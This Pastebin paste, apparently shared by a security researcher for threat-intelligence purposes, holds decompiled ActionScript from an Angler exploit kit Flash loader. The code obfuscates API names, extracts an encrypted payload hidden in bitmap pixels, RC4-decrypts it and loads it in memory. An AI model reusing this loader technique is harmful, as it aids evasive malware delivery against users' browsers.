Neonprimetime

Angler EK flash exploit decompiled swf file

Jun 2nd, 2016
150
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. Angler EK flash exploit decompiled swf file
 2. *******
 3. *******
 4. *******
 5.  
 6. package {
 7.  
 8.     public class IlllI {
 9.  
 10.         public static var 1lIIlI1:String = "";
 11.         public static var Ill1lI1:String = ("h" + "eight");
 12.         public static var lI1lI:String = "";
 13.         public static var I1lI1I1l11:String = "";
 14.         public static var II:String = "";
 15.         public static var II1I1I1:String = "";
 16.         public static var 1lI:String = "";
 17.         public static var 11IIlI1lIl:String = "";
 18.         public static var 1lIIlI1lI1:String = ("w" + "idth");
 19.         public static var 1IlI1IlI1:String = "";
 20.         public static var I11lI1IlI1:String = "";
 21.         public static var lIlI1lII:String = "";
 22.         public static var 11lIlI:String = (("g" + "e") + "tPixel");
 23.         public static var 1I1l1II1lI:String = "";
 24.         public static var 1II1lII:String = "";
 25.         public static var lIIlI1:String = "";
 26.         public static var 1IIlI1:String = "";
 27.         public static var lII1I:String = "";
 28.         public static var 1I:String = "";
 29.         public static var 1lIlI1lI:String = (("bitm" + "apDa") + "ta");
 30.         public static var l11Il:String = "";
 31.         public static var lllI1lI:String = "";
 32.  
 33.         lllI1lI = ("gotoAn" + "dPlay");
 34.         1lIIlI1 = "addedToStage";
 35.         I11lI1IlI1 = (("f" + "lash.utils.By") + "teArray");
 36.         lI1lI = (("writeBy" + "t") + "e");
 37.         I1lI1I1l11 = ("u" + "ncompress");
 38.         II = (("allw" + "Doma") + "in");
 39.         II1I1I1 = ("current" + "Domain");
 40.         1lI = ("leng" + "th");
 41.         11IIlI1lIl = ("getDefini" + "tion");
 42.         1IlI1IlI1 = ((("flas" + "h.d") + "isp") + "lay.Loader");
 43.         lIlI1lII = (("s" + "tag") + "e");
 44.         1I1l1II1lI = (("addEven" + "tL") + "istener");
 45.         1II1lII = ((("remo" + "veEv") + "entL") + "istener");
 46.         lIIlI1 = ("loadByt" + "es");
 47.         1IIlI1 = ("addChil" + "d");
 48.         l11Il = ("positio" + "n");
 49.         lII1I = ("flash.syste" + "m.Security");
 50.         1I = ((("cha" + "rCo") + "deA") + "t");
 51.     }
 52. }//package
 53. package {
 54.     import flash.display.*;
 55.     import flash.system.*;
 56.     import flash.utils.*;
 57.  
 58.     public class l1_lI_11_1lIlI_11_Il_IlI1 extends MovieClip {
 59.  
 60.         private var 1;
 61.         private var ll1IlI1II1lI:Class;
 62.  
 63.         public function l1_lI_11_1lIlI_11_Il_IlI1(_arg1:uint=0){
 64.             this.ll1IlI1II1lI = nlI11lIm;
 65.             super();
 66.             this.1 = ApplicationDomain[IlllI.II1I1I1];
 67.             var _local2:String = IlllI.lIlI1lII;
 68.             var _local3:Number = ((2 + ((3 * 2) / 4)) - 1);
 69.             if (this[_local2]){
 70.                 this.l1II1lI();
 71.             } else {
 72.                 var _local4 = this;
 73.                 _local4[IlllI.1I1l1II1lI](IlllI.1lIIlI1, this.l1II1lI);
 74.             };
 75.         }
 76.         public function l1II1lI():void{
 77.             var _local1:String;
 78.             var _local2:*;
 79.             var _local3:String;
 80.             var _local4:*;
 81.             try {
 82.                 _local1 = IlllI.1II1lII;
 83.                 var _local5 = this;
 84.                 _local5[_local1](IlllI.1lIIlI1, this.l1II1lI);
 85.                 _local2 = this.11IlI1l1llIll();
 86.                 _local2 = this.l1I1IlIlI(_local2);
 87.                 _local3 = IlllI.1IIlI1;
 88.                 _local4 = new ((this.1[IlllI.11IIlI1lIl](IlllI.1IlI1IlI1) as Class))();
 89.                 _local5 = _local4;
 90.                 _local5[IlllI.lIIlI1](_local2);
 91.                 _local5 = this;
 92.                 _local5[_local3](_local4);
 93.             } catch(e:Error) {
 94.             };
 95.         }
 96.         private function lII1lIl1I1(){
 97.             var _local1 = ("2550586827383356736546741637" + "4798327433248564759451375940");
 98.             var _local2:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
 99.             var _local3:uint;
 100.             var _local4:int;
 101.             while (_local4 < _local1[IlllI.1lI]) {
 102.                 _local3 = _local1[IlllI.1I](_local4);
 103.                 var _local5 = _local2;
 104.                 _local5[IlllI.lI1lI](_local3);
 105.                 _local4++;
 106.             };
 107.             _local2[IlllI.l11Il] = 0;
 108.             return (_local2);
 109.         }
 110.         private function 11IlI1l1llIll(){
 111.             var _local8:int;
 112.             var _local9:uint;
 113.             var _local1:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
 114.             var _local2:* = new this.ll1IlI1II1lI()[IlllI.1lIlI1lI];
 115.             var _local3:int = _local2[IlllI.1lIIlI1lI1];
 116.             var _local4:int = _local2[IlllI.Ill1lI1];
 117.             var _local5:uint;
 118.             var _local6:uint = (10 - (5 * 2));
 119.             var _local7:int;
 120.             while (_local7 < _local3) {
 121.                 _local8 = 0;
 122.                 while (_local8 < _local4) {
 123.                     _local9 = _local2[IlllI.11lIlI](_local7, _local8);
 124.                     if ((((_local7 == 0)) && ((_local8 == 0)))){
 125.                         _local5 = (_local9 & 0xFFFFFF);
 126.                     } else {
 127.                         if (_local1[IlllI.1lI] == _local5){
 128.                             break;
 129.                         };
 130.                         var _local10 = _local1;
 131.                         _local10[IlllI.lI1lI]((_local9 & 0xFF));
 132.                         if (_local1[IlllI.1lI] == _local5){
 133.                             break;
 134.                         };
 135.                         _local10 = _local1;
 136.                         _local10[IlllI.lI1lI](((_local9 >> 8) & 0xFF));
 137.                         if (_local1[IlllI.1lI] == _local5){
 138.                             break;
 139.                         };
 140.                         _local10 = _local1;
 141.                         _local10[IlllI.lI1lI](((_local9 >> 16) & 0xFF));
 142.                     };
 143.                     _local8++;
 144.                 };
 145.                 if (_local1[IlllI.1lI] >= _local5){
 146.                     break;
 147.                 };
 148.                 _local7++;
 149.             };
 150.             _local1[IlllI.l11Il] = 0;
 151.             return (_local1);
 152.         }
 153.         public function l1I1IlIlI(_arg1){
 154.             var _local2:* = this.lII1lIl1I1();
 155.             var _local3:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
 156.             var _local4:uint = (9 - 8);
 157.             var _local5:int = (_local4 - 1);
 158.             var _local6:int = (0 + 0);
 159.             var _local7:int = ((27 - 27) + 0);
 160.             var _local8:int = (33 - 33);
 161.             var _local9:int = (48 - 48);
 162.             var _local10:int = (113 - 113);
 163.             var _local11:int = ((_local4 + 1) - 2);
 164.             var _local12:uint = ((10 + 10) - 20);
 165.             var _local13:int = (181 - 181);
 166.             var _local14:uint = (((10 + 10) - 20) - 0);
 167.             var _local15:int = (2342 - 2342);
 168.             _local13 = 0;
 169.             while (_local13 < 0x0100) {
 170.                 var _local17 = _local3;
 171.                 _local17[IlllI.lI1lI](_local13);
 172.                 _local13++;
 173.             };
 174.             var _local16:uint = (_local12 - _local11);
 175.             _local3[IlllI.l11Il] = ((_local16 + _local11) + _local12);
 176.             _local5 = 0;
 177.             while (_local5 < 0x0100) {
 178.                 _local9 = (((_local2[_local8] + (_local3[_local5] & 0xFF)) + _local9) & 0xFF);
 179.                 _local16 = ((0 + 0) + _local3[_local5]);
 180.                 _local3[_local5] = _local3[_local9];
 181.                 _local3[_local9] = _local16;
 182.                 _local8 = ((((_local8 + 1) & 0xFF) % _local2[IlllI.1lI]) & (240 + 15));
 183.                 _local5++;
 184.             };
 185.             _local3[IlllI.l11Il] = 0;
 186.             _local5 = 0;
 187.             while (_local5 < _arg1[IlllI.1lI]) {
 188.                 _local6 = ((_local6 + 1) & (240 + 15));
 189.                 _local7 = ((0 + ((_local3[_local6] & 0xFF) + _local7)) & 0xFF);
 190.                 _local16 = _local3[_local6];
 191.                 _local3[_local6] = _local3[_local7];
 192.                 _local3[_local7] = _local16;
 193.                 _local10 = ((0 + ((_local3[_local6] & 0xFF) + (_local3[_local7] & 0xFF))) & 0xFF);
 194.                 _arg1[_local5] = ((((0 + 0) + _arg1[_local5]) & 0xFF) ^ _local3[_local10]);
 195.                 _local5++;
 196.             };
 197.             return (_arg1);
 198.         }
 199.  
 200.     }
 201. }//package
 202. package {
 203.     import mx.core.*;
 204.  
 205.     public class nlI11lIm extends BitmapAsset {
 206.  
 207.     }
 208. }//package
 209.  
 210.  
 211.  
 212. *******
 213. *******
 214. *******
 215. More FROM @neonprimetime security
 216.  
 217. http://pastebin.com/u/Neonprimetime
 218. https://www.virustotal.com/en/USER/neonprimetime/
 219. https://twitter.com/neonprimetime
 220. https://www.reddit.com/USER/neonprimetime
RAW Paste Data Copied